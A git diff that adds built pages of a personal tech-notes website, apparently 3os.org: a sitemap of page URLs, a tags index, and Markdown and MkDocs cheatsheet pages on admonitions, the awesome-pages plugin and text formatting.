+ https://3os.org/android/adb-cheat-sheet/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/android/apktool/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/android/applications/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/android/jadx-decompiler/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/android/mobsf/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/android/ssl-pinning-bypass/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/automation/ddns-cloudflare-bash/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/automation/ddns-cloudflare-powershell/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/automation/gmail-mark-archived-mail-as-read/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/automation/pihole-cloudflare-dns-sync/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/automation/syncthings/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/automation/guides/better-terminal-experience/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/automation/guides/pihole-doh/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/development/node-npm/npm/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/development/node-npm/pm2/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/development/python/pip/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/development/python/supervisor/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/development/python/virtualenv/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/development/ruby/ruby/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/devops/docker/common-docker-commands/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/devops/docker/docker-containers/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/devops/docker/docker-images/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/devops/docker/docker-install/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/devops/docker/docker-networks/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/devops/docker/docker-security/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/devops/docker/watchtower/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/devops/git/delete-commit-history/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/devops/git/git-cli-cheat-sheet/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/devops/git/git-submodules/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/devops/git/github-cli/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/homelab/devices/synology-nas/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/information/affiliateDisclosure/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/information/cookies-policy/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/information/endorsement/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/information/license/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/information/portfolio/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/information/privacy-policy/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/infrastructure/openwrt/disable-ipv6/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/infrastructure/openwrt/install-oh-my-zsh/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/infrastructure/openwrt/snippets/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/infrastructure/proxmox/cloud-image-template/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/infrastructure/proxmox/lets-encrypt-cloudflare/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/infrastructure/proxmox/pvekclean/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/infrastructure/proxmox/vm-disk-expander/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/infrastructure/proxmox/windows-vm-configuration/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/infrastructure/proxmox/gpu-passthrough/gpu-passthrough-to-vm/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/infrastructure/proxmox/gpu-passthrough/igpu-passthrough-to-vm/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/infrastructure/proxmox/gpu-passthrough/igpu-split-passthrough/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/infrastructure/proxmox/gpu-passthrough/vgpu-split-passthrough/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/infrastructure/proxmox/network/disable-ipv6/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/infrastructure/proxmox/network/proxmox-networking/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/infrastructure/synology/Install-oh-my-zsh/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/infrastructure/synology/Installing-vm-tools-on-virtual-machine/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/infrastructure/synology/auto-dsm-config-backup/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/infrastructure/synology/disable-dms-listening-on-80-443-ports/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/infrastructure/synology/enable-ssh-root-login/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/infrastructure/synology/ssh-with-rsa-key/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/infrastructure/ubiquiti/edge-router/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/infrastructure/ubiquiti/udm-dream-machine/cli-commands/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/infrastructure/ubiquiti/udm-dream-machine/failover-telegram-notifications/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/infrastructure/ubiquiti/udm-dream-machine/persistent-boot-script/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/infrastructure/ubiquiti/udm-dream-machine/persistent-ssh-keys/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/infrastructure/ubiquiti/udm-dream-machine/udm-better-fan-speeds/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/infrastructure/ubiquiti/udm-dream-machine/udm-cloudflare-ddns/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/infrastructure/ubiquiti/udm-dream-machine/wireguard-vpn/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/infrastructure/vmware/vmware-fusion/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/linux/files-handling/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/linux/general-snippets/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/linux/locales-time-zone/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/linux/lvm-partitions/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/linux/memory-swap/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/linux/services-and-daemons/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/linux/smb-mount-autofs/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/linux/ssh-hardening-with-rsa-keys/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/linux/Network/identify-nics/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/linux/ubuntu-debian/disable-ipv6/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/linux/ubuntu-debian/free-port-53/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/linux/ubuntu-debian/remove-snap-store/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/linux/ubuntu-debian/unattended-upgrades/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/mac-os/applications-tweaks/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/mac-os/enable-root-user/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/mac-os/import-ssh-keys-keychain/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/mac-os/terminal-snippets/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/mac-os/touch-id-for-sudo/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/mac-os/ui-tweaks/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/mac-os/homebrew/brewup/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/mac-os/homebrew/homebrew-snippets/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/mac-os/python/pyenv-virtualenv/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/penetration-testing/cheatsheets/cli-commands-collation/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/penetration-testing/cheatsheets/gobuster-cheatsheet/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/penetration-testing/cheatsheets/nmap-cheatsheet/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/penetration-testing/cheatsheets/xss-cheatsheet/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/penetration-testing/kali-linux/bettercap1.6.2/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/penetration-testing/kali-linux/kali-linux/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/penetration-testing/kali-linux/links/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/penetration-testing/kali-linux/metasploit/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/penetration-testing/kali-linux/wifite/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/penetration-testing/proxmark/about-proxmark/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/penetration-testing/proxmark/cheatsheet/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/penetration-testing/proxmark/mifare-tags/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/penetration-testing/utilities/clickjacking/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/penetration-testing/utilities/idd-generator/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/raspberry-pi/docker-raspberrypi/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/raspberry-pi/external-power-button/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/raspberry-pi/motion-sensor-display-control/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/raspberry-pi/snippets/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/raspberry-pi/guides/3g-modem-host/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/raspberry-pi/projects/magic-mirror-v2/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/raspberry-pi/projects/magic-mirror/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/utilities/htpasswd-generator/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/utilities/useful-links-tools/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/utilities/wifiQrGenerator/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/utilities/browsers-extensions/chrome/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/utilities/browsers-extensions/firefox/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/utilities/markdown-cheatsheet/about/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/utilities/markdown-cheatsheet/admonition/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/utilities/markdown-cheatsheet/awesome-pages/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/utilities/markdown-cheatsheet/basic-formatting/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/utilities/markdown-cheatsheet/code-blocks/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/utilities/markdown-cheatsheet/content-tabs/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/utilities/markdown-cheatsheet/diagrams/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/utilities/markdown-cheatsheet/external-markdown/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/utilities/markdown-cheatsheet/icons/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/utilities/markdown-cheatsheet/images/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/utilities/markdown-cheatsheet/links/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/utilities/markdown-cheatsheet/tables-lists-quotes/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/windows/ssh-server/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/windows/useful-software/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/windows/windows-servers/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/windows/windows-ssh-agent-with-keys/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/windows/windows-tweaks/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/windows/guides/declare-locations/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/windows/guides/email-from-task-scheduler/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/tags/
+ 2023-11-26
+ daily
+
+
\ No newline at end of file
diff --git a/sitemap.xml.gz b/sitemap.xml.gz
new file mode 100644
index 000000000..214809eb5
Binary files /dev/null and b/sitemap.xml.gz differ
diff --git a/tags/index.html b/tags/index.html
new file mode 100644
index 000000000..490641ac0
--- /dev/null
+++ b/tags/index.html
@@ -0,0 +1,143 @@
+ Tags and Categories - 3os Authors: fire1ce | Created: 2022-02-20 | Last update: 2022-03-18 3g-modem Cookies Git HomeLab IID NAS OpenSSH Proxmox SSH Security Synology Tweeks Ubuntu VirtIO Windows Windows Virtual Machines Windwos adb admonition affiliate android application autofs automation bash cheat-sheet cheatsheet chrome cli clickjacking cloudflare code-blocks collation commands container content-tabs ddns debian decompiler diagram dns dns-over-https docker docker-compose doh dsm ed25519 edgerouter emojis endorsements extensions external-markdown files-handling firefox frida gem git github gpu headings history homebrew horizontal-line htpasswd iTerm2 icons igpu images ipv6 java kali kali-linux letsencrypt license links linux lists locales lvm macOS maco macos magic-mirror magicmirror markdown markdown-cheatsheet mermaid mkdocs motion-sensor mount network node npm oh-my-zsh package-manager passthrough penetration-testing pi-hole pip pm2 portfolio ports powershell privacy policy process-manager processes-manager proxmox pt python quotes raspberry-pi resume reverse-engineering rfid rsa rsa-keys ruby security servers share smb snippets ssh ssh-server ssl-pinning submodules supervisor syncthing synology tables template terminal text-highlighting timezone touchID ubiquiti ubuntu udm unifi utilities venv vgpu virtualization vmware vmware-fusion watchtower wifi windows wireguard zsh Back to top
\ No newline at end of file
diff --git a/utilities/browsers-extensions/chrome/index.html b/utilities/browsers-extensions/chrome/index.html
new file mode 100644
index 000000000..b2d5f5ac0
--- /dev/null
+++ b/utilities/browsers-extensions/chrome/index.html
@@ -0,0 +1,167 @@
+ Chrome Extensions - 3os chrome extensions Chrome Extensions List of extensions for Chrome browser.
Back to top
\ No newline at end of file
diff --git a/utilities/browsers-extensions/firefox/index.html b/utilities/browsers-extensions/firefox/index.html
new file mode 100644
index 000000000..1d433ef2f
--- /dev/null
+++ b/utilities/browsers-extensions/firefox/index.html
@@ -0,0 +1,167 @@
+ Firefox Extensions - 3os firefox extensions Authors: fire1ce | Created: 2022-03-24 | Last update: 2022-04-17 Firefox Extensions List of extensions for Firefox browser.
Back to top
\ No newline at end of file
diff --git a/utilities/htpasswd-generator/index.html b/utilities/htpasswd-generator/index.html
new file mode 100644
index 000000000..cd6b8a8d5
--- /dev/null
+++ b/utilities/htpasswd-generator/index.html
@@ -0,0 +1,167 @@
+ htpasswd Password Generator - 3os htpasswd Authors: fire1ce | Created: 2021-08-27 | Last update: 2022-08-05 htpasswd Password Generator This htpasswd password encryption applet is written in JavaScript, so the entire process runs within your browser.Nothing is transmitted to any server, we take your privacy and securityserious.
Credit & Sources The code was built by macminiosx and cloned from his repository . It was slightly modified to fit this website.
Back to top
\ No newline at end of file
diff --git a/utilities/markdown-cheatsheet/about/index.html b/utilities/markdown-cheatsheet/about/index.html
new file mode 100644
index 000000000..66ce24bb0
--- /dev/null
+++ b/utilities/markdown-cheatsheet/about/index.html
@@ -0,0 +1,143 @@
+ About Markdown - 3os markdown-cheatsheet mkdocs Authors: fire1ce | Created: 2022-02-20 | Last update: 2022-08-05 About Markdown Markdown is a lightweight markup language with plain text formatting syntax. It is designed so that it can be converted to HTML and many other formats using a tool by the same name. Markdown is often used to format readme files, for writing messages in online discussion forums, and to create rich text using a plain text editor. As the initial description of Markdown contained ambiguities and unanswered questions, many implementations and extensions of Markdown appeared over the years to answer these issues.
This Page is fully written with Markdown Language and converted to HTML
Material for MkDocs Markdown This website is built with MkDocs . MkDocs is a static site generator that can be used to generate websites with a clean and simple user interface. It is a free and open source project.
Warning
Most of the advanced features used to generate this website and the Markdown syntax used from Material Theme for MkDocs and may not apply to other websites.
Back to top
\ No newline at end of file
diff --git a/utilities/markdown-cheatsheet/admonition/index.html b/utilities/markdown-cheatsheet/admonition/index.html
new file mode 100644
index 000000000..587e3082a
--- /dev/null
+++ b/utilities/markdown-cheatsheet/admonition/index.html
@@ -0,0 +1,168 @@
+ Admonitions - 3os markdown-cheatsheet mkdocs admonition Authors: fire1ce | Created: 2022-02-20 | Last update: 2022-04-03 Markdown Admonitions Admonitions, also known as call-outs , are an excellent choice for including side content without significantly interrupting the document flow. Material for MkDocs provides several different types of admonitions and allows for the inclusion and nesting of arbitrary content.
Usage Admonitions follow a simple syntax: a block starts with !!!
, followed by a single keyword used as a [type qualifier]. The content of the block follows on the next line, indented by four spaces:
Admonition !!! note
+
+ Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla et euismod
+ nulla. Curabitur feugiat, tortor non consequat finibus, justo purus auctor
+ massa, nec semper lorem quam in massa.
+
Note
Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla et euismod nulla. Curabitur feugiat, tortor non consequat finibus, justo purus auctor massa, nec semper lorem quam in massa.
Changing The Title By default, the title will equal the type qualifier in titlecase. However, it can be changed by adding a quoted string containing valid Markdown (including links, formatting, ...) after the type qualifier:
Admonition with custom title !!! note "Phasellus posuere in sem ut cursus"
+
+ Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla et euismod
+ nulla. Curabitur feugiat, tortor non consequat finibus, justo purus auctor
+ massa, nec semper lorem quam in massa.
+
Phasellus posuere in sem ut cursus
Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla et euismod nulla. Curabitur feugiat, tortor non consequat finibus, justo purus auctor massa, nec semper lorem quam in massa.
Removing The Title Similar to [changing the title], the icon and title can be omitted entirely by adding an empty string directly after the type qualifier. Note that this will not work for [collapsible blocks]:
Admonition without title !!! note ""
+
+ Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla et euismod
+ nulla. Curabitur feugiat, tortor non consequat finibus, justo purus auctor
+ massa, nec semper lorem quam in massa.
+
Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla et euismod nulla. Curabitur feugiat, tortor non consequat finibus, justo purus auctor massa, nec semper lorem quam in massa.
Collapsible Blocks When [Details] is enabled and an admonition block is started with ???
instead of !!!
, the admonition is rendered as a collapsible block with a small toggle on the right side:
Admonition, collapsible ??? note
+
+ Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla et euismod
+ nulla. Curabitur feugiat, tortor non consequat finibus, justo purus auctor
+ massa, nec semper lorem quam in massa.
+
Note Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla et euismod nulla. Curabitur feugiat, tortor non consequat finibus, justo purus auctor massa, nec semper lorem quam in massa.
Adding a +
after the ???
token renders the block expanded:
Admonition, collapsible and initially expanded ???+ note
+
+ Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla et euismod
+ nulla. Curabitur feugiat, tortor non consequat finibus, justo purus auctor
+ massa, nec semper lorem quam in massa.
+
Note Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla et euismod nulla. Curabitur feugiat, tortor non consequat finibus, justo purus auctor massa, nec semper lorem quam in massa.
Supported Types Following is a list of type qualifiers provided by Material for MkDocs, whereas the default type, and thus fallback for unknown type qualifiers, is note
:
note
Note
Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla et euismod nulla. Curabitur feugiat, tortor non consequat finibus, justo purus auctor massa, nec semper lorem quam in massa.
abstract
, summary
, tldr
Abstract
Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla et euismod nulla. Curabitur feugiat, tortor non consequat finibus, justo purus auctor massa, nec semper lorem quam in massa.
info
, todo
Info
Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla et euismod nulla. Curabitur feugiat, tortor non consequat finibus, justo purus auctor massa, nec semper lorem quam in massa.
tip
, hint
, important
Tip
Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla et euismod nulla. Curabitur feugiat, tortor non consequat finibus, justo purus auctor massa, nec semper lorem quam in massa.
success
, check
, done
Success
Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla et euismod nulla. Curabitur feugiat, tortor non consequat finibus, justo purus auctor massa, nec semper lorem quam in massa.
question
, help
, faq
Question
Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla et euismod nulla. Curabitur feugiat, tortor non consequat finibus, justo purus auctor massa, nec semper lorem quam in massa.
warning
, caution
, attention
Warning
Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla et euismod nulla. Curabitur feugiat, tortor non consequat finibus, justo purus auctor massa, nec semper lorem quam in massa.
failure
, fail
, missing
Failure
Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla et euismod nulla. Curabitur feugiat, tortor non consequat finibus, justo purus auctor massa, nec semper lorem quam in massa.
danger
, error
Danger
Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla et euismod nulla. Curabitur feugiat, tortor non consequat finibus, justo purus auctor massa, nec semper lorem quam in massa.
bug
Bug
Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla et euismod nulla. Curabitur feugiat, tortor non consequat finibus, justo purus auctor massa, nec semper lorem quam in massa.
example
Example
Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla et euismod nulla. Curabitur feugiat, tortor non consequat finibus, justo purus auctor massa, nec semper lorem quam in massa.
quote
, cite
Quote
Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla et euismod nulla. Curabitur feugiat, tortor non consequat finibus, justo purus auctor massa, nec semper lorem quam in massa.
Back to top
\ No newline at end of file
diff --git a/utilities/markdown-cheatsheet/awesome-pages/index.html b/utilities/markdown-cheatsheet/awesome-pages/index.html
new file mode 100644
index 000000000..e0138226f
--- /dev/null
+++ b/utilities/markdown-cheatsheet/awesome-pages/index.html
@@ -0,0 +1,265 @@
+ Awesome Pages Plugin - 3os template markdown Authors: fire1ce | Created: 2022-03-24 | Last update: 2022-04-03 Mkdocs Awesome Pages Plugin An MkDocs plugin that simplifies configuring page titles and their order
The awesome-pages plugin allows you to customize how your pages show up the navigation of your MkDocs without having to configure the full structure in your mkdocs.yml. It gives you detailed control using a small configuration file directly placed in the relevant directory of your documentation. MkDocs Awesome Pages Plugin Github Repository
Features Customize Navigation Create a file named .pages
in a directory and use the nav
attribute to customize the navigation on that level. List the files and subdirectories in the order that they should appear in the navigation.
nav :
+ - subdirectory
+ - page1.md
+ - page2.md
+
Rest Pages or sections that are not mentioned in the list will not appear in the navigation. However, you may include a ...
entry to specify where all remaining items should be inserted.
nav :
+ - introduction.md
+ - ...
+ - summary.md
+
Furthermore, it is possible to filter the remaining items using glob patterns or regular expressions. For example to match only the Markdown files starting with introduction-
.
nav :
+ - ... | introduction-*.md
+ - ...
+ - summary.md
+
Note: The pattern is checked against the basename (folder- / filename) of remaining items - not their whole path.
For more details refer to the Rest Filter Patterns section below.
Titles You can optionally specify a title for the navigation entry.
nav :
+ - ...
+ - First page : page1.md
+
Note: Specifying a title for a directory containing a .pages
file that defines a title
has no effect.
Links You can also use the nav
attribute to add additional links to the navigation.
nav :
+ - ...
+ - Link Title : https://lukasgeiter.com
+
Sections You can group items by creating new sections.
nav :
+ - introduction.md
+ - Section 1 :
+ - page1.md
+ - page2.md
+ - Section 2 :
+ - ...
+
Change Sort Order Create a file named .pages
in a directory and set the order
attribute to asc
or desc
to change the order of navigation items.
Note: Unlike the default order, this does not distinguish between files and directories. Therefore pages and sections might get mixed.
Natural Sort Type Create a file named .pages
in a directory and set the sort_type
attribute to natural
to use natural sort order .
This can be combined with order
above.
Order Navigation By Preference Create a file named .pages
in a directory and set the order_by
attribute to filename
or title
to change the order of navigation items.
This can be combined with order
and/or sort_type
above. If order
is not set it will order ascending. If no preference is set, it will order by filename.
Collapse Single Nested Pages Note: This feature is disabled by default. More on how to use it below
If you have directories that only contain a single page, awesome-pages can "collapse" them, so the folder doesn't show up in the navigation.
For example if you have the following file structure:
docs/
+├─ section1/
+│ ├─ img/
+│ │ ├─ image1.png
+│ │ └─ image2.png
+│ └─ index.md # Section 1
+└─ section2/
+ └─ index.md # Section 2
+
The pages will appear in your navigation at the root level:
Instead of how MkDocs would display them by default:
Section 1 Index Section 2 Index For all pages Collapsing can be enabled globally using the collapse_single_pages
option in mkdocs.yml
For a sub-section If you only want to collapse certain pages, create a file called .pages
in the directory and set collapse_single_pages
to true
:
collapse_single_pages : true
+
You may also enable collapsing globally using the plugin option and then use the .pages
file to prevent certain sub-sections from being collapsed by setting collapse_single_pages
to false
.
Note: This feature works recursively. That means it will also collapse multiple levels of single pages.
For a single page If you want to enable or disable collapsing of a single page, without applying the setting recursively, create a file called .pages
in the directory and set collapse
to true
or false
:
Hide Directory Create a file named .pages
in a directory and set the hide
attribute to true
to hide the directory, including all sub-pages and sub-sections, from the navigation:
Note: This option only hides the section from the navigation. It will still be included in the build and can be accessed under its URL.
Set Directory Title Create a file named .pages
in a directory and set the title
to override the title of that directory in the navigation:
Arrange Pages Deprecated: arrange
will be removed in the next major release - Use nav
instead .
Create a file named .pages
in a directory and set the arrange
attribute to change the order of how child pages appear in the navigation. This works for actual pages as well as subdirectories.
title : Page Title
+arrange :
+ - page1.md
+ - page2.md
+ - subdirectory
+
If you only specify some pages, they will be positioned at the beginning, followed by the other pages in their original order.
You may also include a ...
entry at some position to specify where the rest of the pages should be inserted:
arrange :
+ - introduction.md
+ - ...
+ - summary.md
+
In this example introduction.md
is positioned at the beginning, summary.md
at the end, and any other pages in between.
Combine Custom Navigation & File Structure MkDocs gives you two ways to define the structure of your navigation. Either create a custom navigation manually in mkdocs.yml
or use the file structure to generate the navigation. This feature makes it possible to combine both methods. Allowing you to manually define parts of your navigation without having to list all files.
Note: You can freely combine this with all the other features of this plugin. However they will only affect the part of the navigation that is not defined manually.
Use the nav
entry in mkdocs.yml
to define the custom part of your navigation. Include a ...
entry where you want the navigation tree of all remaining pages to be inserted.
The following examples are based on this file structure:
docs/
+├─ introduction.md
+├─ page1.md
+├─ page2.md
+└─ folder/
+ ├─ introduction.md
+ ├─ page3.md
+ └─ page4.md
+
If you wanted introduction.md
, page1.md
and page2.md
to appear under their own section you could do this:
nav :
+ - Start :
+ - page1.md
+ - page2.md
+ - summary.md
+ - ...
+
Which would result in the following navigation:
Start Introduction Page 1 Page 2 Folder Introduction Page 3 Page 4 The ...
entry can also be placed at a deeper level:
nav :
+ - page1.md
+ - Rest :
+ - ...
+
Which would result in the following navigation:
Page 1 Rest Introduction Page 2 Folder Introduction Page 3 Page 4 Furthermore, it is possible to filter the remaining items using glob patterns or regular expressions. For example to match only files named introduction.md
.
nav :
+ - Introductions :
+ - ... | **/introduction.md
+ - ...
+
With the following result:
Introductions Introduction Introduction Page 1 Page 2 Folder Note: The pattern is checked against the path relative to the docs directory.
For more details refer to the Rest Filter Patterns section below.
By default, remaining items keep their hierarchical structure. You may add flat
to flatten all the matching pages:
nav :
+ - page1.md
+ - Rest :
+ - ... | flat | **/introduction.md
+ - ... | flat
+
Page 1 Rest Introduction Introduction Page 2 Page 3 Page 4
Rest Filter Patterns In all places where the rest entry (...
) is allowed, you can also include a glob pattern or regular expression to filter the items to be displayed.
nav :
+ - ... | page-*.md
+ - ... | regex=page-[0-9]+.md
+
The filter only operates on remaining items. This means it will not include items that are explicitly listed in the navigation or items that are matched by another filter that appears earlier in the configuration.
You may also include a rest entry without filter to act as a catch-all, inserting everything that is not matched by a filter.
Syntax Details Unless the filter starts with regex=
it is interpreted as glob pattern, however you may also explicitly say so using glob=
. The spaces around ...
are optional but recommended for readability.
Note: Depending on the characters in your filter, you might also need to use quotes around the whole entry.
nav :
+ # equivalent glob entries
+ - ... | page-*.md
+ - ... | glob=page-*.md
+ - ...|page-*.md
+ - '... | page-*.md'
+
+ # equivalent regex entries
+ - ... | regex=page-[0-9]+.md
+ - ...|regex=page-[0-9]+.md
+ - '... | regex=page-[0-9]+.md'
+
Options You may customize the plugin by passing options in mkdocs.yml
:
plugins :
+ - awesome-pages :
+ filename : .index
+ collapse_single_pages : true
+ strict : false
+ order : asc
+ sort_type : natural
+ order_by : title
+
filename
Name of the file used to configure pages of a directory. Default is .pages
collapse_single_pages
Enable the collapsing of single nested pages. Default is false
strict
Raise errors instead of warnings when:
arrange
entries cannot be found nav
entries cannot be found Default is true
order
, sort_type
and order_by
Global fallback values for the Meta attributes. Default is None
or filename
.
Back to top
\ No newline at end of file
diff --git a/utilities/markdown-cheatsheet/basic-formatting/index.html b/utilities/markdown-cheatsheet/basic-formatting/index.html
new file mode 100644
index 000000000..358e5b065
--- /dev/null
+++ b/utilities/markdown-cheatsheet/basic-formatting/index.html
@@ -0,0 +1,162 @@
+ Basic Formatting - 3os markdown-cheatsheet mkdocs headings text-highlighting horizontal-line Authors: fire1ce | Created: 2022-02-26 | Last update: 2022-04-03 Text Styling Markdown makes it easy to format messages. Type a message as you normally would, then use these the following formatting syntax to render the message a specific way
Markdown Syntax Result **bold**
bold _italic_
italic ==highlight==
highlight ~~strike through~~
strike through ^^underline^^
underline `Inline Code`
Inline Code
==_you_ **can** ^^combine^^ `too`==
you can combine too
Horizontal Line Horizontal Line Example Horizontal line
+
+---
+
+Three consecutive dashes
+
Result:
Horizontal line
Three consecutive dashes
Heading To create a heading, add number signs (#) in front of a word or phrase. The number of number signs you use should correspond to the heading level. For example, to create a heading level three (h3), use three number signs (e.g., ### My Header).
Headings from h1
through h6
are constructed with a #
for each level:
Regular Headings Regular Headings (h1-h6) ### Heading 3
+
+#### Heading 4
+
+##### Heading 5
+
+###### Heading 6
+
Result:
Heading 3 Heading 4 Heading 5 Heading 6 Headings with secondary text Headings with secondary text (h1-h6) ### Heading 3 <small>with secondary text</small>
+
+#### Heading 4 <small>with secondary text</small>
+
